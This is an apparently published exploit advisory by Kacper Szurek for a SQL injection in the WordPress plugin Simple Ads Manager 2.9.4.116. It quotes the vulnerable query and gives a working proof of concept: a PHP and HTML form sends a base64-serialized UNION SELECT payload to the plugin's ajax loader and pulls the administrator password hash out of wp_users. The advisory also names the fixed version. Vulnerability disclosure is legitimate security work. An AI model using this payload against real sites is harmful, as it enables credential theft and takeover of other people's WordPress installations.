# Exploit Title: Simple Ads Manager 2.9.4.116 SQL Injection # Date: 30-12-2015 # Software Link: https://wordpress.org/plugins/simple-ads-manager/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description $whereClause and $whereClauseT and $whereClauseW and $whereClause2W are not escaped. File: simple-ads-manager\ad.class.php $aSql = " (SELECT @pid := sp.id AS pid, 0 AS aid, sp.name, sp.patch_source AS code_mode, @code_before := sp.code_before AS code_before, @code_after := sp.code_after AS code_after, @ad_size := IF(sp.place_size = \"custom\", CONCAT(CAST(sp.place_custom_width AS CHAR), \"x\", CAST(sp.place_custom_height AS CHAR)), sp.place_size) AS ad_size, sp.patch_code AS ad_code, sp.patch_img AS ad_img, \"\" AS ad_alt, 0 AS ad_no, sp.patch_link AS ad_target, 0 AS ad_swf, \"\" AS ad_swf_flashvars, \"\" AS ad_swf_params, \"\" AS ad_swf_attributes, \"\" AS ad_swf_fallback, sp.patch_adserver AS ad_adserver, sp.patch_dfp AS ad_dfp, 0 AS count_clicks, 0 AS code_type, IF((sp.patch_source = 1 AND sp.patch_adserver) OR sp.patch_source = 2, -1, 1) AS ad_cycle, @aca := IFNULL((SELECT AVG(sa.ad_weight_hits*10/(sa.ad_weight*$cycle)) FROM $aTable sa WHERE sa.pid = @pid AND sa.trash IS NOT TRUE AND {$whereClause} {$whereClauseT} {$whereClause2W}), 0) AS aca FROM {$pTable} sp WHERE {$pId} AND sp.trash IS FALSE) UNION (SELECT sa.pid, sa.id AS aid, sa.name, sa.code_mode, @code_before AS code_before, @code_after AS code_after, @ad_size AS ad_size, sa.ad_code, sa.ad_img, sa.ad_alt, sa.ad_no, sa.ad_target, sa.ad_swf, sa.ad_swf_flashvars, sa.ad_swf_params, sa.ad_swf_attributes, sa.ad_swf_fallback, 0 AS ad_adserver, 0 AS ad_dfp, sa.count_clicks, sa.code_type, IF(sa.ad_weight, (sa.ad_weight_hits*10/(sa.ad_weight*$cycle)), 0) AS ad_cycle, @aca AS aca FROM {$aTable} sa WHERE sa.pid = @pid AND sa.trash IS FALSE AND {$whereClause} {$whereClauseT} {$whereClauseW}) ORDER BY ad_cycle LIMIT 1;"; http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html 2. Proof of Concept <?php $out = array(); $out['WC'] = '1=0'; $out['WCT'] = ''; $out['WCW'] = ') UNION (SELECT user_pass, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2 FROM wp_users WHERE ID = 1'; $out['WC2W'] = ''; ?> <form method="post" action="http://wp-url/wp-content/plugins/simple-ads-manager/sam-ajax-loader.php"> <input type="hidden" name="action" value="load_place"> <input type="hidden" name="id" value="0"> <input type="hidden" name="pid" value="1"> <input type="text" name="wc" value="<?php echo base64_encode(serialize($out)); ?>"> <input type="submit" value="Send"> </form> Administrator password will be here: {"success":true,"ad":"<div id='c2077_1_%here_is_password%' class='sam-container sam-place' data-sam='0'><\/div>","id":"1","pid":"%here_is_password%","cid":"c2077_1_%here_is_password%"} 3. Solution: Update to version 2.9.5.118